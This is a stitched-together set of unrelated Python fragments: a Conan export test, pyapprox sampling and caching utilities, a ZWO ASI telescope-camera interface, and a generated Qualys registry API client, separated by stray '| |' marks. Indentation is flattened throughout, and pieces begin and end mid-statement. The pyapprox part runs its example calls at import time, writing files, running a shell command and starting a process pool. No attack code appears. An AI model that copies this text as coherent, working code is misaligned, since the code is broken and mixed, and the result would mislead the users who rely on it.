class OpenSSLConan(ConanFile):
name = "openssl"
version = "2.0.1"
exports = ('*.txt', '*.h')
"""
save(os.path.join(self.client.current_folder, CONANFILE), content)
self.client.run("export . lasote/stable")
self.assertEqual(sorted(os.listdir(reg_path)),
['CMakeLists.txt', CONANFILE, CONAN_MANIFEST,
'helloHello0.h'])
# Now exports being a list instead a tuple
content = """
from conans import ConanFile
class OpenSSLConan(ConanFile):
name = "openssl"
version = "2.0.1"
exports = ['*.txt', '*.h']
"""
save(os.path.join(self.client.current_folder, CONANFILE), content)
self.client.run("export . lasote/stable")
self.assertEqual(sorted(os.listdir(reg_path)),
['CMakeLists.txt', CONANFILE, CONAN_MANIFEST, 'helloHello0.h'])
def test_export_the_same_code(self):
file_list = self._create_packages_and_builds()
# Export the same conans
# Do not adjust cpu_count, it is reusing a cache
client2 = TestClient(self.client.cache_folder, cpu_count=False)
files2 = cpp_hello_conan_files("Hello0", "0.1")
client2.save(files2)
client2.run("export . lasote/stable")
reg_path2 = client2.cache.package_layout(self.ref).export()
digest2 = FileTreeManifest.load(client2.cache.package_layout(self.ref).export())
self.assertNotIn('A new Conan version was exported', client2.out)
self.assertNotIn('Cleaning the old builds ...', client2.out)
self.assertNotIn('Cleaning the old packs ...', client2.out)
self.assertNotIn('All the previous packs were cleaned', client2.out)
self.assertIn('%s: A new conanfile.py version was exported' % str(self.ref),
self.client.out)
self.assertIn('%s: Folder: %s' % (str(self.ref), reg_path2), self.client.out)
self.assertTrue(os.path.exists(reg_path2))
for name in list(files2.keys()):
self.assertTrue(os.path.exists(os.path.join(reg_path2, name)))
expected_sums = {'hello.cpp': '4f005274b2fdb25e6113b69774dac184',
'main.cpp': '0479f3c223c9a656a718f3148e044124',
'CMakeLists.txt': '10d907c160c360b28f6991397a5aa9b4',
'conanfile.py': '355949fbf0b4fc32b8f1c5a338dfe1ae',
'executable': '68b329da9893e34099c7d8ad5cb9c940',
'helloHello0.h': '9448df034392fc8781a47dd03ae71bdd'}
self.assertEqual(expected_sums, digest2.file_sums)
for f in file_list:
self.assertTrue(os.path.exists(f))
def test_export_a_new_version(self):
self._create_packages_and_builds()
# Export an update of the same conans
# Do not adjust cpu_count, it is reusing a cache
client2 = TestClient(self.client.cache_folder, cpu_count=False)
files2 = cpp_hello_conan_files("Hello0", "0.1")
files2[CONANFILE] = "# insert comment\n %s" % files2[CONANFILE]
client2.save(files2)
client2.run("export . lasote/stable")
reg_path3 = client2.cache.package_layout(self.ref).export()
digest3 = FileTreeManifest.load(client2.cache.package_layout(self.ref).export())
self.assertIn('%s: A new conanfile.py version was exported' % str(self.ref),
self.client.out)
self.assertIn('%s: Folder: %s' % (str(self.ref), reg_path3), self.client.out)
self.assertTrue(os.path.exists(reg_path3))
for name in list(files2.keys()):
self.assertTrue(os.path.exists(os.path.join(reg_path3, name)))
expected_sums = {'hello.cpp': '4f005274b2fdb25e6113b69774dac184',
'main.cpp': '0479f3c223c9a656a718f3148e044124',
'CMakeLists.txt': '10d907c160c360b28f6991397a5aa9b4',
'conanfile.py': 'ad17cf00b3142728b03ac37782b9acd9',
'executable': '68b329da9893e34099c7d8ad5cb9c940',
'helloHello0.h': '9448df034392fc8781a47dd03ae71bdd'}
self.assertEqual(expected_sums, digest3.file_sums)
# for f in file_list:
# self.assertFalse(os.path.exists(f))
def _create_packages_and_builds(self):
reg_builds = self.client.cache.package_layout(self.ref).builds()
reg_packs = self.client.cache.package_layout(self.ref).packages()
folders = [os.path.join(reg_builds, '342525g4f52f35f'),
os.path.join(reg_builds, 'ew9o8asdf908asdf80'),
os.path.join(reg_packs, '342525g4f52f35f'),
os.path.join(reg_packs, 'ew9o8asdf908asdf80')]
file_list = []
for f in folders:
for name, content in {'file1.h': 'asddfasdf', 'file1.dll': 'asddfasdf'}.items():
file_path = os.path.join(f, name)
save(file_path, content)
file_list.append(file_path)
return file_list
class ExportMetadataTest(unittest.TestCase):
conanfile = textwrap.dedent("""
from conans import ConanFile
class Lib(ConanFile):
revision_mode = "{revision_mode}"
""")
summary_hash = "bfe8b4a6a2a74966c0c4e0b34705004a"
def test_revision_mode_hash(self):
t = TestClient()
t.save({'conanfile.py': self.conanfile.format(revision_mode="hash")})
ref = ConanFileReference.loads("name/version@user/channel")
t.run("export . {}".format(ref))
meta = t.cache.package_layout(ref, short_paths=False).load_metadata()
self.assertEqual(meta.recipe.revision, self.summary_hash)
def test_revision_mode_scm(self):
path, rev = create_local_git_repo(
files={'conanfile.py': self.conanfile.format(revision_mode="scm")})
t = TestClient(current_folder=path)
ref = ConanFileReference.loads("name/version@user/channel")
t.run("export . {}".format(ref))
meta = t.cache.package_layout(ref, short_paths=False).load_metadata()
self.assertEqual(meta.recipe.revision, rev)
def test_revision_mode_invalid(self):
conanfile = self.conanfile.format(revision_mode="auto")
t = TestClient()
t.save({'conanfile.py': conanfile})
ref = ConanFileReference.loads("name/version@user/channel")
t.run("export . {}".format(ref), assert_error=True)
self.assertIn("ERROR: Revision mode should be one of 'hash' (default) or 'scm'", t.out)
def test_export_no_params(self):
client = TestClient()
client.save({"conanfile.py": GenConanfile().with_name("lib").with_version("1.0")})
client.run('export .')
client.cache.package_layout(ConanFileReference.loads("lib/1.0@")).export()
self.assertIn("lib/1.0: A new conanfile.py version was exported", client.out)
# Do it twice
client.run('export . ')
self.assertIn("lib/1.0: The stored package has not changed", client.out)
def export_with_name_and_version_test(self):
client = TestClient()
client.save({"conanfile.py": GenConanfile()})
client.run('export . lib/1.0@')
self.assertIn("lib/1.0: A new conanfile.py version was exported", | |
import time
import numpy as np
import subprocess
import os
import glob
from functools import partial
from multiprocessing import Pool
from pyapprox.utilities import get_all_sample_combinations
from pyapprox.utilities import hash_array
def get_num_args(function):
"""
Return the number of arguments of a function.
If function is a member function of a class the self argument is not
counted.
Parameters
----------
function : callable
The Python callable to be interrogated
Returns
-------
num_args : integer
The number of arguments to the function including
args, varargs, keywords
"""
import inspect
args = inspect.getfullargspec(function)
num_args = 0
if args[0] is not None:
num_args += len(args[0])
if 'self' in args[0]:
num_args -= 1
if args[1] is not None:
# args[1] is the *varargs name (a string), so count it as one argument
num_args += 1
if args[2] is not None:
# args[2] is the **keywords name (a string), so count it as one argument
num_args += 1
# do not count defaults of keywords contained in args[3]
# if args[3] is not None:
# num_args += len(args[3])
return num_args
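# Usage sketch for get_num_args:
def _model(sample, opts):
    return sample.sum()
assert get_num_args(_model) == 2
class _Model:
    def __call__(self, sample):
        return sample.sum()
assert get_num_args(_Model().__call__) == 1  # 'self' is not counted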
def evaluate_1darray_function_on_2d_array(function, samples, opts=None):
"""
Evaluate a function at a set of samples using a function that only takes
one sample at a time
Parameters
----------
function : callable
A function with signature
``function(sample) -> np.ndarray``
where sample is a 1d np.ndarray of shape (num_vars) and the output is
a np.ndarray of values of shape (num_qoi). The output can also be a
scalar
samples : np.ndarray (num_vars, num_samples)
The samples at which to evaluate the model
opts : dictionary
A set of options that are needed to evaluate the model
Returns
-------
values : np.ndarray (num_samples, num_qoi)
The value of each requested QoI of the model for each sample
"""
num_args = get_num_args(function)
assert samples.ndim == 2
num_samples = samples.shape[1]
if num_args == 2:
values_0 = function(samples[:, 0], opts)
else:
values_0 = function(samples[:, 0])
values_0 = np.atleast_1d(values_0)
assert values_0.ndim == 1
num_qoi = values_0.shape[0]
values = np.empty((num_samples, num_qoi), float)
values[0, :] = values_0
for i in range(1, num_samples):
if num_args == 2:
values[i, :] = function(samples[:, i], opts)
else:
values[i, :] = function(samples[:, i])
return values
class PyFunction(object):
def __init__(self, function):
self.function = function
def __call__(self, samples, opts=dict()):
return evaluate_1darray_function_on_2d_array(self.function, samples, opts)
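# Usage sketch: wrap a one-sample-at-a-time function so it accepts the
# (num_vars, num_samples) sample layout used throughout this module:
fn = PyFunction(lambda sample: np.atleast_1d(sample.sum()))
example_samples = np.random.uniform(0., 1., (2, 5))
assert fn(example_samples).shape == (5, 1)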
def run_shell_command(shell_command, opts={}):
"""
Execute a shell command.
Parameters
----------
shell_command : string
The command that you want executed
output_verbosity : integer (default=1)
0 - suppress all model output
1 - write output to file
2 - write output to stdout
filename : string (default=None)
The filename to which the output of the shell command is written.
A file is only written if output_verbosity=1.
If output_verbosity=1 and filename is None then
filename = shell_command.out
env : os.environ (default=None)
Mapping that defines the environment variables for the new process;
these are used instead of inheriting the current process environment,
which is the default behavior.
"""
output_verbosity = opts.get('verbosity', 1)
env = opts.get('env', None)
filename = opts.get('filename', None)
if output_verbosity == 0:
subprocess.check_output(shell_command, shell=True, env=env)
elif output_verbosity == 1:
if filename is None:
filename = 'shell_command.out'
with open(filename, 'w') as f:
subprocess.call(shell_command, shell=True, stdout=f,
stderr=f, env=env)
else:
subprocess.call(shell_command, shell=True, env=env)
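# Usage sketch (assumes a POSIX shell): capture a command's output in a file.
run_shell_command('echo hello', opts={'verbosity': 1, 'filename': 'hello.out'})
with open('hello.out') as f:
    assert f.read().strip() == 'hello'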
class DataFunctionModel(object):
def hash_sample(self, sample):
# if samples have undergone a transformation their values
# may not be exactly the same, so compute the hash on samples
# with fixed precision
# sample = np.round(sample, self.digits)
# I = np.where(np.abs(sample)<self.tol)[0]
# sample[I] = 0.
key = hash_array(sample) # ,decimals=self.digits)
return key
def __init__(self, function, data=None, data_basename=None,
save_frequency=None, use_hash=True, digits=16):
self.function = function
self.data = dict()
self.samples = np.zeros((0, 0))
self.values = None
self.num_evaluations_ran = 0
self.num_evaluations = 0
self.digits = digits
self.tol = 10**(-self.digits)
self.use_hash = use_hash
self.data_basename = data_basename
self.save_frequency = save_frequency
if self.data_basename is not None:
assert save_frequency is not None
if self.save_frequency and self.data_basename is None:
msg = 'Warning save_frequency not being used because data_basename'
msg += ' is None'
print(msg)
if data_basename is not None:
file_data = combine_saved_model_data(data_basename)
if file_data[0] is not None:
self.add_new_data(file_data)
if data is not None:
self.samples, self.values = data
assert self.samples.shape[1] == self.values.shape[0]
self.add_new_data(data)
def add_new_data(self, data):
samples, values = data
for ii in range(samples.shape[1]):
if self.use_hash:
key = self.hash_sample(samples[:, ii])
if key in self.data:
if not np.allclose(self.values[self.data[key]], values[ii]):
msg = 'Duplicate samples found but values do not match'
raise Exception(msg)
found = True
else:
self.data[key] = ii
found = False
else:
found = False
for jj in range(self.samples.shape[1]):
if np.allclose(self.samples[:, jj], samples[:, ii],
atol=self.tol):
found = True
break
if not found:
if self.samples.shape[1] > 0:
self.samples = np.hstack(
[self.samples, samples[:, ii:ii+1]])
self.values = np.vstack([self.values, values[ii:ii+1, :]])
else:
self.samples = samples[:, ii:ii+1]
self.values = values[ii:ii+1, :]
# set counter so that the next file takes into account all previously
# run samples
self.num_evaluations_ran = self.samples.shape[1]
def _batch_call(self, samples):
assert self.save_frequency > 0
num_batch_samples = self.save_frequency
lb = 0
vals = None
while lb < samples.shape[1]:
ub = min(lb+num_batch_samples, samples.shape[1])
num_evaluations_ran = self.num_evaluations_ran
batch_vals, new_sample_indices = self._call(samples[:, lb:ub])
data_filename = self.data_basename+'-%d-%d.npz' % (
num_evaluations_ran,
num_evaluations_ran+len(new_sample_indices)-1)
np.savez(data_filename, vals=batch_vals[new_sample_indices],
samples=samples[:, lb:ub][:, new_sample_indices])
if vals is None:
vals = batch_vals
else:
vals = np.vstack((vals, batch_vals))
lb = ub
return vals
def _call(self, samples):
evaluated_sample_indices = []
new_sample_indices = []
for ii in range(samples.shape[1]):
if self.use_hash:
key = self.hash_sample(samples[:, ii])
if key in self.data:
evaluated_sample_indices.append([ii, self.data[key]])
else:
new_sample_indices.append(ii)
else:
found = False
for jj in range(self.samples.shape[1]):
if np.allclose(self.samples[:, jj], samples[:, ii],
atol=self.tol):
found = True
break
if found:
evaluated_sample_indices.append([ii, jj])
else:
new_sample_indices.append(ii)
evaluated_sample_indices = np.asarray(evaluated_sample_indices)
if len(new_sample_indices) > 0:
new_samples = samples[:, new_sample_indices]
new_values = self.function(new_samples)
num_qoi = new_values.shape[1]
else:
num_qoi = self.values.shape[1]
values = np.empty((samples.shape[1], num_qoi), dtype=float)
if len(new_sample_indices) > 0:
values[new_sample_indices, :] = new_values
if len(new_sample_indices) < samples.shape[1]:
values[evaluated_sample_indices[:, 0]] = \
self.values[evaluated_sample_indices[:, 1], :]
if len(new_sample_indices) > 0:
if self.samples.shape[1] == 0:
jj = 0
self.samples = samples
self.values = values
else:
jj = self.samples.shape[1]  # number of previously stored samples (columns)
self.samples = np.hstack(
(self.samples, samples[:, new_sample_indices]))
self.values = np.vstack((self.values, new_values))
for ii in range(len(new_sample_indices)):
key = hash_array(samples[:, new_sample_indices[ii]])
self.data[key] = jj+ii
self.num_evaluations_ran += len(new_sample_indices)
# increment the number of samples passed to __call__ since the object was
# created; includes samples drawn from the archive and samples used to
# evaluate self.function
self.num_evaluations += samples.shape[1]
return values, new_sample_indices
def __call__(self, samples):
if self.save_frequency is not None and self.save_frequency > 0:
values = self._batch_call(samples)
else:
values = self._call(samples)[0]
return values
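# Usage sketch: repeated samples are served from the cache, so the wrapped
# function runs once per unique sample.
model = DataFunctionModel(PyFunction(lambda s: np.atleast_1d(s.sum())))
cached_samples = np.random.uniform(0., 1., (2, 4))
model(cached_samples)
model(cached_samples)                   # second call hits the cache
assert model.num_evaluations == 8       # all samples passed to __call__
assert model.num_evaluations_ran == 4   # unique samples actually evaluated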
def run_model_samples_in_parallel(model, max_eval_concurrency, samples,
pool=None, assert_omp=True):
"""
Warning
-------
pool.map serializes each argument and so if model is a class,
any of its member variables that are updated in __call__ will not
persist once each __call__ to pool completes.
"""
num_samples = samples.shape[1]
if assert_omp and max_eval_concurrency > 1:
if ('OMP_NUM_THREADS' not in os.environ or
not int(os.environ['OMP_NUM_THREADS']) == 1):
msg = 'User set assert_omp=True but OMP_NUM_THREADS has not been '
msg += 'set to 1. Run script with '
msg += 'OMP_NUM_THREADS=1 python script.py'
raise Exception(msg)
if pool is None:
pool_given = False
pool = Pool(max_eval_concurrency)
else:
pool_given = True
result = pool.map(
model, [(samples[:, ii:ii+1]) for ii in range(samples.shape[1])])
if pool_given is False:
pool.close()
# result = [model(samples[:, ii:ii+1]) for ii in range(samples.shape[1])]
num_qoi = result[0].shape[1]
values = np.empty((num_samples, num_qoi))
for ii in range(len(result)):
values[ii, :] = result[ii][0, :]
return values
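# Usage sketch honoring the warning above: the model must be picklable (a
# module-level function, not a lambda) and the script should be launched
# with OMP_NUM_THREADS=1 when assert_omp is True.
def _sum_qoi(samples):
    # maps (num_vars, num_samples) to (num_samples, num_qoi)
    return samples.sum(axis=0)[:, None]
parallel_values = run_model_samples_in_parallel(
    _sum_qoi, max_eval_concurrency=2,
    samples=np.random.uniform(0., 1., (2, 8)))
assert parallel_values.shape == (8, 1)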
def time_function_evaluations(function, samples):
vals = []
times = []
for ii in range(samples.shape[1]):
t0 = time.time()
val = function(samples[:, ii:ii+1])[0, :]
t1 = time.time()
vals.append(val)
times.append([t1-t0])
vals = np.asarray(vals)
times = np.asarray(times)
return np.hstack([vals, times])
class TimerModelWrapper(object):
def __init__(self, function, base_model=None):
self.function_to_time = function
self.base_model = base_model
def x__getattr__(self, name):
"""
Cannot get following to work
If defining a custom __getattr__ it seems I cannot have member
variables with the same name in this class and class definition
of function
if self.function is itself a model object allow the access of
self.function.name using self.name
Note __getattr__
will be invoked on python objects only when the requested
attribute is not found in the particular object's space.
"""
if hasattr(self.function_to_time, name):
attr = getattr(self.function_to_time, name)
return attr
raise AttributeError(
f" {self} or its member {self}.function has no attribute '{name}'")
def __call__(self, samples):
return time_function_evaluations(self.function_to_time, samples)
class WorkTracker(object):
"""
Store the cost needed to evaluate a function under different
configurations."""
"""Cameras for use in telescope tracking control loop.
A set of classes that inherit from the abstract base class Camera, providing a common API for
interacting with cameras. The main application for a camera relevant to this package is as a
sensor to be paired with computer vision algorithms that can estimate the position error of a
target.
"""
from abc import ABC, abstractmethod
from typing import Tuple
from math import inf
import enum
import os
import time
import fcntl
import select
import mmap
import errno
import ctypes
import numpy as np
import v4l2
from configargparse import Namespace
import cv2
import asi
from asi import ASICheck, ASIError
from track.config import ArgParser
class Camera(ABC):
"""Abstract base class for cameras"""
@property
@abstractmethod
def pixel_scale(self) -> float:
"""Field of view of a single pixel.
This is a property of the camera and the optical system to which it is attached. The value
returned should be correct for the size of the physical photosites in the camera sensor,
which may be different from the effective size of pixels returned by get_frame() if binning
is enabled.
Returns:
Scale of a pixel in degrees per pixel.
"""
@property
@abstractmethod
def binning(self) -> int:
"""Binning configuration.
Many cameras support binning of multiple physical photosites in a square grid into a single
value as if they were a single photosite. The binning number is the number of photosites
on each side of such a grid, so a binning of 2 means photosites are grouped into 2x2 grids
of four photosites each. A binning value of 1 means that no binning is applied and all
photosites are preserved.
Returns:
Binning number.
"""
@property
@abstractmethod
def field_of_view(self) -> Tuple[float, float]:
"""Field of view of the camera.
This is a function of the camera physical sensor size and the focal length of the optical
system to which it is attached.
Returns:
A tuple (height, width) giving the field of view in degrees.
"""
@property
@abstractmethod
def frame_shape(self) -> Tuple[int, int]:
"""Dimensions of the frame in pixels.
This should be identical to the .shape property of the arrays returned by get_frame(). It
should therefore account for any processing that occurs between the camera sensor and
get_frame() that alters the resolution such as binning or region of interest (ROI).
Returns:
Resolution as a tuple of (height, width) in pixels.
"""
@property
@abstractmethod
def video_mode(self) -> bool:
"""Indicate if camera is in video mode.
Returns:
True if the camera is in video mode. False otherwise.
"""
@video_mode.setter
@abstractmethod
def video_mode(self, enabled: bool) -> None:
"""Enable or disable video mode if camera supports this.
Raises:
ValueError if the camera does not support the requested mode.
"""
@abstractmethod
def get_frame(self, timeout: float = inf) -> np.ndarray:
"""Get a frame from the camera.
This method should return the latest frame from the camera. It should be implemented such
that the same frame is not returned more than once. If no new frame is available since the
previous call it should block until either a new frame arrives or the timeout expires. If
multiple frames have arrived since the last call only the most recent should be returned
and the others should be dropped. It is the responsibility of the caller to call frequently
enough to avoid dropping frames if frame loss is a problem.
Args:
timeout: How long to wait for a frame in seconds.
Returns:
Latest frame from the camera or None if the timeout expires before a frame arrives. The
shape of the array should match the frame_shape property.
"""
@staticmethod
@abstractmethod
def add_program_arguments(parser: ArgParser, profile: str) -> None:
"""Adds program arguments specific to this camera.
This method should add program arguments required by this camera to the passed-in ArgParser
instance.
"""
class CameraTimeout(Exception):
"""Raised when a timeout expires"""
class ASICamera(Camera):
"""ZWO ASI Cameras"""
class BitDepth(enum.IntEnum):
"""Bit depth of pixels."""
RAW8 = asi.ASI_IMG_RAW8
RAW16 = asi.ASI_IMG_RAW16
def bytes_per_pixel(self) -> int:
"""Number of bytes per pixel in raw array of frame data retrieved from ASI driver"""
return 1 if self == self.RAW8 else 2
@staticmethod
def add_program_arguments(parser: ArgParser, profile: str) -> None:
"""Adds program arguments for ZWO ASI camera configuration.
Args:
parser: The instance of ArgParser to which this function will add arguments.
profile: 'track' or 'align' to indicate which set of arguments to add.
Raises:
ValueError if profile is set to an invalid string.
"""
if profile == 'align':
parser.add_argument(
'--zwo-exposure-time-align',
help='ZWO camera exposure time used during alignment in seconds',
default=0.5,
type=float
)
parser.add_argument(
'--zwo-gain-align',
help='ZWO camera gain used during alignment',
default=400,
type=int
)
elif profile == 'track':
parser.add_argument(
'--zwo-exposure-time',
help='ZWO camera exposure time used during tracking in seconds',
default=0.03,
type=float
)
parser.add_argument(
'--zwo-gain',
help='ZWO camera gain used during tracking',
default=10,
type=int
)
else:
raise ValueError('profile must be "track" or "align"')
parser.add_argument(
'--zwo-binning',
help='ZWO camera binning',
default=4,
type=int
)
parser.add_argument(
'--zwo-name',
help='ZWO camera name (use to select between multiple connected cameras)',
type=str
)
@staticmethod
def from_program_args(args: Namespace, profile: str) -> 'ASICamera':
"""Factory to make a WebCam instance from program arguments
Args:
args: Set of program arguments.
profile: Set to 'track' to use the tracking gain and exposure time or to 'align' to
use the alignment gain and exposure time.
Returns:
An instance of ASICamera initialized with the appropriate configuration.
Raises:
ValueError if profile is set to an invalid string.
"""
camera = ASICamera(
pixel_scale=args.camera_pixel_scale / 3600.0,
binning=args.zwo_binning,
name=args.zwo_name,
)
if profile == 'track':
camera.exposure = args.zwo_exposure_time
camera.gain = args.zwo_gain
camera.video_mode = True
elif profile == 'align':
camera.exposure = args.zwo_exposure_time_align
camera.gain = args.zwo_gain_align
camera.video_mode = False
else:
raise ValueError('profile must be "track" or "align"')
return camera
def __init__(
self,
pixel_scale: float,
binning: int = 1,
video_mode: bool = False,
name: str = None,
):
"""Initialize and configure ZWO ASI camera.
Args:
pixel_scale: Scale of a pixel in degrees per pixel before binning.
binning: Camera binning.
video_mode: False for one-shot mode, True for video mode.
name: Connect only to a camera where the Name member of the info struct matches this
string. If None the name is not checked and the first camera is used. Note that
multiple cameras could have the same Name; when this is the case, this constructor
will connect to the first camera having a Name that matches.
Raises:
ASIError for any camera related problems.
"""
num_connected = asi.ASIGetNumOfConnectedCameras()
if num_connected == 0:
raise ASIError('No cameras connected')
# find the right camera
self.info = None
for idx in range(num_connected):
# pylint does not seem to handle SWIG bindings perfectly
# pylint: disable=no-value-for-parameter
info = ASICheck(asi.ASIGetCameraProperty(idx))
if name is None or name == info.Name:
self.info = info
break
if self.info is None:
raise ASIError(f'Could not find a camera with name "{name}"')
self._pixel_scale = pixel_scale
self._binning = binning
width = self.info.MaxWidth // binning
height = self.info.MaxHeight // binning
self._frame_shape = (height, width)
ASICheck(asi.ASIOpenCamera(self.info.CameraID))
ASICheck(asi.ASIInitCamera(self.info.CameraID))
ASICheck(asi.ASISetControlValue(self.info.CameraID, asi.ASI_MONO_BIN, 1, asi.ASI_FALSE))
ASICheck(
asi.ASISetControlValue(
self.info.CameraID,
asi.ASI_BANDWIDTHOVERLOAD,
94,
asi.ASI_FALSE
)
)
self.video_mode = video_mode
def __del__(self):
if hasattr(self, 'info') and self.info is not None:
ASICheck(asi.ASICloseCamera(self.info.CameraID))
def _set_ctrl(self, ctrl, value: int):
# auto mode always disabled since we generally don't trust it
ASICheck(asi.ASISetControlValue(self.info.CameraID, ctrl, value, asi.ASI_FALSE))
def _get_ctrl(self, ctrl):
return ASICheck(asi.ASIGetControlValue(self.info.CameraID, ctrl))
@property
def pixel_scale(self) -> float:
"""Scale of a pixel in degrees per pixel"""
return self._pixel_scale
@property
def binning(self) -> int:
"""Binning configuration"""
return self._binning
@property
def frame_shape(self) -> Tuple[int, int]:
"""Shape of array returned by get_frame()"""
return self._frame_shape
@property
def field_of_view(self) -> Tuple[float, float]:
"""Field of view of the camera (height, width) in degrees."""
return (self._pixel_scale * self.info.MaxHeight, self._pixel_scale * self.info.MaxWidth)
@property
def video_mode(self) -> bool:
"""True if video mode is enabled"""
return self._video_mode
@video_mode.setter
def video_mode(self, enabled: bool) -> None:
"""Enable or disable video mode"""
self._bit_depth = self.BitDepth.RAW8 if enabled else self.BitDepth.RAW16
height, width = self._frame_shape
self._frame_size_bytes = width * height * self._bit_depth.bytes_per_pixel()
ASICheck(
asi.ASISetROIFormat(self.info.CameraID,
width,
height,
self._binning,
self._bit_depth)
)
if enabled:
ASICheck(
asi.ASISetControlValue(
self.info.CameraID,
asi.ASI_HIGH_SPEED_MODE,
1,
asi.ASI_FALSE
)
)
ASICheck(asi.ASIStartVideoCapture(self.info.CameraID))
else:
ASICheck(
asi.ASISetControlValue(
self.info.CameraID,
asi.ASI_HIGH_SPEED_MODE,
0,
asi.ASI_FALSE
)
)
ASICheck(asi.ASIStopVideoCapture(self.info.CameraID))
self._video_mode = enabled
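# --- Mode-switch sketch: assigning to video_mode re-programs the ROI format and
# bit depth (RAW8 plus high-speed video capture when enabled, RAW16 one-shot when
# disabled), so profiles can be flipped at runtime (illustrative) ---
#
# >>> cam.video_mode = False   # one-shot RAW16 capture, e.g. for alignment
# >>> cam.video_mode = True    # RAW8 high-speed video, e.g. for tracking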
@property
def | |
noqa: E501
if 'page_size' in params:
query_params.append(('pageSize', params['page_size'])) # noqa: E501
if 'sort' in params:
query_params.append(('sort', params['sort'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['bearerAuth'] # noqa: E501
return self.api_client.call_api(
'/registry', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Registries', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_cs_registry_details(self, registry_id, **kwargs): # noqa: E501
"""Show details of a registry # noqa: E501
Show details of a registry # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cs_registry_details(registry_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str registry_id: Provide the ID/UUID of the registry whose details you want to fetch. (required)
:return: RegistryDetails
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_cs_registry_details_with_http_info(registry_id, **kwargs) # noqa: E501
else:
(data) = self.get_cs_registry_details_with_http_info(registry_id, **kwargs) # noqa: E501
return data
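# --- Usage sketch (hypothetical wiring; the Configuration/ApiClient/DefaultApi
# class names follow the usual swagger-codegen layout and are assumptions, as is
# the token value) ---
#
# >>> config = Configuration()
# >>> config.access_token = "..."                      # bearer token
# >>> api_instance = DefaultApi(ApiClient(config))
# >>> details = api_instance.get_cs_registry_details(registry_id)      # synchronous
# >>> thread = api_instance.get_cs_registry_details(registry_id, async_req=True)
# >>> details = thread.get()                                           # asynchronous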
def get_cs_registry_details_with_http_info(self, registry_id, **kwargs): # noqa: E501
"""Show details of a registry # noqa: E501
Show details of a registry # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cs_registry_details_with_http_info(registry_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str registry_id: Provide the ID/UUID of the registry whose details you want to fetch. (required)
:return: RegistryDetails
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['registry_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_cs_registry_details" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'registry_id' is set
if ('registry_id' not in params or
params['registry_id'] is None):
raise ValueError("Missing the required parameter `registry_id` when calling `get_cs_registry_details`") # noqa: E501
collection_formats = {}
path_params = {}
if 'registry_id' in params:
path_params['registryId'] = params['registry_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['bearerAuth'] # noqa: E501
return self.api_client.call_api(
'/registry/{registryId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='RegistryDetails', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_cs_registry_repositories(self, registry_id, **kwargs): # noqa: E501
"""Show a list of repositories in a registry # noqa: E501
Show a list of repositories in a registry # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cs_registry_repositories(registry_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str registry_id: Provide the ID of the registry for which you want to list the repositories. (required)
:param str filter: Filter the repository list by providing a query using Qualys syntax.
:param int page_number: The page to be returned.
:param int page_size: The number of records per page to be included in the response.
:param str sort: Sort the results using a Qualys token.
:return: Repositories
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_cs_registry_repositories_with_http_info(registry_id, **kwargs) # noqa: E501
else:
(data) = self.get_cs_registry_repositories_with_http_info(registry_id, **kwargs) # noqa: E501
return data
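# --- Paging/filtering sketch (continuing the hypothetical client above; the
# filter and sort values are placeholders for Qualys-syntax tokens, not verified
# examples) ---
#
# >>> repos = api_instance.get_cs_registry_repositories(
# ...     registry_id,
# ...     filter='...',        # query in Qualys syntax
# ...     page_number=1,
# ...     page_size=50,
# ...     sort='...')          # Qualys sort token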
def get_cs_registry_repositories_with_http_info(self, registry_id, **kwargs): # noqa: E501
"""Show a list of repositories in a registry # noqa: E501
Show a list of repositories in a registry # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cs_registry_repositories_with_http_info(registry_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str registry_id: Provide the ID of the registry for which you want to list the repositories. (required)
:param str filter: Filter the repository list by providing a query using Qualys syntax.
:param int page_number: The page to be returned.
:param int page_size: The number of records per page to be included in the response.
:param str sort: Sort the results using a Qualys token.
:return: Repositories
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['registry_id', 'filter', 'page_number', 'page_size', 'sort'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_cs_registry_repositories" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'registry_id' is set
if ('registry_id' not in params or
params['registry_id'] is None):
